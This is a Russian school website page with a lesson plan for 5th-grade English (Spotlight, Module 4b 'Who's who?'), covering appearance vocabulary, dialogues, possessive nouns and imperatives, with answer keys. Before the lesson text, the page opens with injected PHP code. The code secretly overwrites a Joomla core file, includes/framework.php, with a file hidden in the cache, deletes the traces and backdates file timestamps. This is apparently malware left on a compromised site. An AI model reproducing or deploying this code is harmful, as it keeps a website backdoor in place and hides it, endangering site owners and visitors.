$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Конспекты уроков английского языка в 5 классе (Spotlight) - Урок №3

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 290
Просмотры материалов : 209880

На сайте

Сейчас 45 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

Конспекты уроков английского языка в 5 классе (Spotlight) - Урок №3

Индекс материала
Конспекты уроков английского языка в 5 классе (Spotlight)
Урок №2
Урок №3
Все страницы

5 класс дата:

Модуль 4 Family ties «Семейные узы»;

Урок 3

4b Who’s who?

Начало урока

Задачи: активизация изученной ранее тематической лексики; мотивирование на дальнейшее изучение темы «Семья».

Vocabulary

Упр. 1, с. 58. Задача: повторение и категоризация лексики по теме «Внешность».

a) Написав заголовки на доске, попросите учащихся вспомнить соответствующие слова, запишите цепочки.

Ключи: Facial features: round face, big/pointed nose, blue eyes, etc

Height: tall, short, of average height, etc

Hair: long, curly, wavy, etc

Build: fat, slim, thin, plump, of average build, etc

Затем учащиеся описывают персонажей на картинках, используя эти слова. После этого попросите их прочитать данные характеристики-описания и соотнести их с рисунками (Who is

who?). Проверьте ответы.

Ключи: 1 Fred Flintstone, 2 Obelix, 3 Asterix, 4 Wilma Flintstone, 5 Goofy, 6 Esmeralda.

— Попросите дополнить группы слов на основе данных описаний.

Ключи: Facial features: big mouth, big nose, red moustache, big eyes, small nose, small mouth,

long ears

Height: short, tall

Hair: red hair, fair hair, long brown hair

Build: plump, fat, thin

— Предложите учащимся перенести лексический материал в тетради (словари, если они ведутся), можно в графической форме (spidergrams).

b) Поясните задание, организуйте работу с образцом. Затем один из учащихся (по желанию)

выбирает персонажа для описания и записывает на листке его имя. Учитель и этот ученик

исполняют диалог по образцу.

— Учащиеся работают в парах. Организуйте контроль работы пар, обеспечивая необходимую помощь. Попросите несколько пар разыграть свои диалоги перед классом.

Предполагаемый ответ:

A: Is it a he?

B: No.

A: Is she tall?

B: No, she isn’t.

A: Has she got red hair?

B: Yes, she has.

A: Is it Wilma Flintstone?

B: Yes, it is.

Everyday English

Упр. 2, с. 58. Задача: развитие умений вести диалог-расспрос (запрос и сообщение

фактической информации о третьем лице).

— Учебники закрыты. Спросите, как учащиеся понимают выражение personal information.

Предложите ситуацию: в класс пришел новый ученик. Попросите учащихся составить вопросы, которые они хотели бы задать новичку.

Запишите эти вопросы на доске, подчеркнув вопросительные слова (who, where, how old,

etc) и глаголы/вспомогательные глаголы (can, has, do/does, is/are, etc).

— Учебники открыты. Обратитесь к таблице. Учащиеся в парах с опорой на материал таблицы задают друг другу вопросы о своем однокласснике и отвечают на них. Организуйте

контроль работы пар. Попросите несколько пар разыграть свои диалоги перед классом.

Предполагаемый ответ:

A: What’s his name?

B: His name’s Vladimir.

A: Where’s he from?

B: He’s from Ekaterinburg.

A: How old is he?

B: He’s eleven years old.

A: Has he got any brothers or sisters?

B: No, he hasn’t. He’s an only child.

• Упр. 3, с. 59.

— Организуйте работу по изучению раздела

Study Skills. Проверьте понимание. Объясните учащимся, что данные рекомендации относятся ко всем заданиям на заполнение пропусков в тексте. Подчеркните важность понимания контекста для успешного выполнения заданий этого формата. Необходимо понять, к чему/кому относятся личные местоимения в пропущенных предложениях и соответственно, где их место в тексте.

a) Задача: развитие умений прогнозирования содержания текста.

— Обратите внимание учащихся на задание — понимание основной мысли текста. Учащиеся читают слова Janet в диалоге. Проверьте понимание общего содержания, спросив, кто разговаривает (Janet and Steve), где происходит действие (at a party) и о ком идет речь (about a boy).

b) Задачи: развитие умений поискового и изучающего чтения.

— Учащиеся повторно читают реплики Janet и дают предполагаемые ответы на вопросы.

Предложите учащимся прочитать предложения A—F и заполнить ими пропуски 1—5. Учащиеся работают самостоятельно. Учащиеся дают свои варианты ответов, обосновывая их. Организуйте прослушивание аудиозаписи (1—2 раза) для самопроверки. Проверьте ответы.

с) Задача: развитие техники чтения вслух.

— Учащиеся в парах читают диалог вслух по ролям. Следите за произношением и интонацией.

Несколько пар читают диалог перед классом.

Ключи: 1 C, 2 A, 3 F, 4 B, 5 E.

Janet: This party is fantastic!

Steve: Yes, it is.

Janet: Hey, look at that boy over there. Who is he?

Steve: The one with the fair hair?

Janet: Yes. What’s his name?

Steve: Johnny. He’s Bill’s brother.

Janet: He’s got lovely blue eyes. How old is he?

Steve: He’s fifteen.

Janet: What’s he like?

Steve: He’s very funny. Come and meet him.

Grammar

Упр. 4, с. 59. Задачи: освоение формообразования и использования в связной речи форм притяжательного падежа существительных.

a) Учебники закрыты. Возьмите с парты одного из учащихся любой предмет и покажите его

классу. Спросите, чей это предмет.

T: Whose pencil is this?

Ss: Lena’s. Etc.

— Указывая на предмет, принадлежащий нескольким (двоим) учащимся, спросите:

T: Whose desk is this?

Ss: Sasha and Natasha’s.

— Проверьте понимание способа образования формы притяжательного падежа существительных в единственном числе.

— Учебники открыты. Прочитайте первый столбик таблицы. Учащиеся читают второй столбик

и сравнивают образование форм притяжательного падежа существительных во множествен_

ном и единственном числе. Учащиеся приводят свои примеры. Проверьте ответы. Обратите

внимание учащихся на соответствующий раздел грамматического справочника в конце учеб_

ника.

Предполагаемый ответ:

Singular

Whose sister is Janet?

Janet is Mary’s sister.

Janet is Mary and Pat’s sister.

Plural

Janet, Mary and Pat have a teddy bear. It’s the girls’ teddy bear.

These are women’s handbags.

b) Обратитесь к рисунку семейного древа, спросите учащихся, кто есть кто. Учащиеся

работают в парах, составляя микродиалоги по образцу.

— Попросите несколько пар представить свои диалоги/фрагменты диалогов перед классом.

Ключи:

A: Who’s George?

B: He’s Lyn’s husband, Sarah’s father and Sally,

Joe and Kate’s grandfather.

A: Whose sister is Kate?

B: She’s Joe and Sally’s sister.

Упр. 5, с. 59. Задача: обобщение формообразования глаголов в повелительном наклонении.

Ключи: Janet: ... look at that boy over there.

Steve: Come and meet him.

•Упр. 6, с. 59. Задача: использование в связной речи глаголов в повелительном наклонении.

— Учащиеся работают самостоятельно по образцу. Проверьте ответы. Поясните, что глаголы в повелительном наклонении могут означать инструкции, рекомендации, советы, команды.

Попросите учащихся привести свои примеры желательно в соответствии с заданной ситуацией.

Ключи: 2 Don’t look at him. 3 Sit down (please).

4 Be quiet. 5 Don’t play the guitar. 6 Don’t stand up.

Speaking

Упр. 7, с. 59. Задача: развитие умения вести диалог-расспрос о третьем лице.

— Проанализируйте вместе с учащимися диалог упр. 3, записывая на доске его план-схему.

— Учащиеся в парах разыгрывают диалоги по схеме. Организуйте дифференцированную помощь в правильном использовании лексического, грамматического материала, а также в

произношении и интонации. Попросите несколько пар разыграть свои диалоги/фрагменты диалогов перед классом.

Предполагаемый ответ:

S1: This party is fantastic!

S2: Yes, it is.

S1: Hey, look at that boy over there. Who is he?

S2: Which boy? The one with the dark hair?

S1: Yes. What’s his name?

S2: Ivan. He’s Marina’s brother.

S1: He’s got lovely green eyes. How old is he?

S2: He’s 14.

S1: What’s he like?

S2: He’s very clever and friendly. Come and meet him.

Writing

Упр. 8, с. 59. Задача: развитие умения писать короткий текст-описание человека с

опорой на образец.

— Организуйте чтение и анализ образца. Учащиеся выбирают необходимую информацию из

предложений: имя, возраст, рост, телосложение, цвет волос, черты лица, особенности характера. Записывают план в тетрадях. Завершение работы может быть предложено в качестве домашнего задания.

Предполагаемый ответ: Katya is 12 years old. Shes tall and slim. She’s got fair hair, green eyes and a big mouth. Shes very kind and clever.

Подведение итогов урока проводится по образцу предыдущих уроков.

Домашнее задание: SB, упр. 8*, с. 59

(оформление для языкового портфеля — по выбору учащихся); WB, с. 36.